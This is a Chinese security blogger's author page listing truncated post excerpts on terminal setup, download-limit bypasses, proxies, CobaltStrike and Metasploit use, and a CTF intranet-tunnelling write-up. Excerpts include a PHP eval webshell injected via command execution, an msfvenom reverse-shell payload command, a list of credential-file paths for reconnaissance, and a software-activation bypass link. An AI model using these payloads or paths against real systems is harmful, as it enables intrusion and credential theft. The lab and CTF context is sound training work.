作者: huayang

138 篇文章

【原创】美化MAC终端
安装zsh sudo apt install zsh 切换为zsh chsh -s /bin/zsh 安装wget brew install wget 安装oh-my-zsh sh -c "$(wget https://gitee.com/mirrors/oh-my-zsh/raw/master/tools/install.sh -O -)" 如果无法安装就去root目录看看oh-my-zsh文件…
【原创】百度云不限速(mac版)
用油猴下载这个插件 https://greasyfork.org/zh-CN/scripts/370634-%E6%87%92%E4%BA%BA%E4%B8%93%E7%94%A8-%E5%85%A8%E7%BD%91vip%E8%A7%86%E9%A2%91%E5%85%8D%E8%B4%B9%E7%A0%B4%E8%A7%A3%E5%8E%BB%E5%B9%BF%E5%91%8A-%E5%85…
【原创 脚本】Selenium-weight
# !/usr/bin/python # -*- coding:utf-8 -*- # author: huayang # time: 2021.10.12-2021.11.4 import re import os import time import json import xlwt import requests import threading from selenium import w…
【转载】新翻墙代理服务器
原文地址:https://jiyiren.github.io/2019/06/16/justmysocks/ 本文不提供翻墙服务,只作为技术交流教程! 2019.10.7号更新:最近国庆期间,有很多 Justmysocks 不能使用,相应的修复方法见博客最后面:Just My Socks 服务更新使用说明 部分,只要修改加密方式,基本就可解决不可用问题,对安卓的代理应用进行了区别说明。 下面是原始…
【原创】常用服务器绝对路径
[huayang] /etc/passwd 是linux系统保存用户信息及其工作目录的文件 /etc/shadow 是linux系统保存用户信息及(可能存在)密码(hash)的文件 /etc/apache2 是apache的配置文件,可以看见web的目录和服务端口等信息,常用于确认路径 /etc/nginx nginx配置文件,,可以看见web的目录和服务端口等信息,常用于确认路径 /etc/ho…
thumbnail
【原创】内网穿透案例
[huayang] 案列一(Frp内网渗透) 大概图列 网上随便找的,路线是这个样子 这里选用ctfshow的一道命令执行题 由Frp实现内网访问及扫描 1.传入一句话,上线蚁剑 http://b85fdf24-b98e-4810-9e76-a038a8987630.challenge.ctf.show:8080/?c=`echo '<?php eval(\$_POST[1]);?&…
thumbnail
【原创 精华】CobaltStrike与msf联动
[huayang] 基础 大致使用方法 注意:这里创建的ip指向的开cs服务器的ip不是cs应用的ip 如果kali开服务 win开应用 则下面的ip指向kali cs与msf联动 cs发送给msf cs拿到服务器后再新建个监听 建好过后去msf开启监听 run一下 进入beacon即可看见运行 这样就顺利连上了 msf发送给cs 比如我在msf上提权过后发送给cs 首先提权 提权成功后 use …
thumbnail
【原创】macOS安装CobaltStrike(内网,公网)
这个必须在linux下环境启用且拥有java环境 所以最好的办法就是在kali里搭建 首先把文件移到kali,给权限 搭建服务 kali的ip加密码 这样就算启动好了,再去物理机ping kali,能通就直接打开cs https://hellohy.top/huayang/7146.html [/huayang]
thumbnail
【原创】macOS下PhpStorm 配置
[huayang] 下载地址:https://www.jetbrains.com/phpstorm/download/#section=mac mamp下载地址:https://www.mamp.info/en/downloads/ 非永久激活:http://idea.medeming.com/jets/ 外观 服务 配置mamp 打开mamp,点击设置 放在要测试的php文件夹即可 最后点击st…
thumbnail
【原创】MSF简单提权开启远程桌面并连接
攻击机: kali:172.16.181.8 win sever2012 :172.16.181.4 目标机: win7:172.16.181.9 建立连接 msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.181.8 LPORT=4444 -f exe -o 123.exe 把马放入目标机,因为我的虚拟机有点小问题,不能用samba…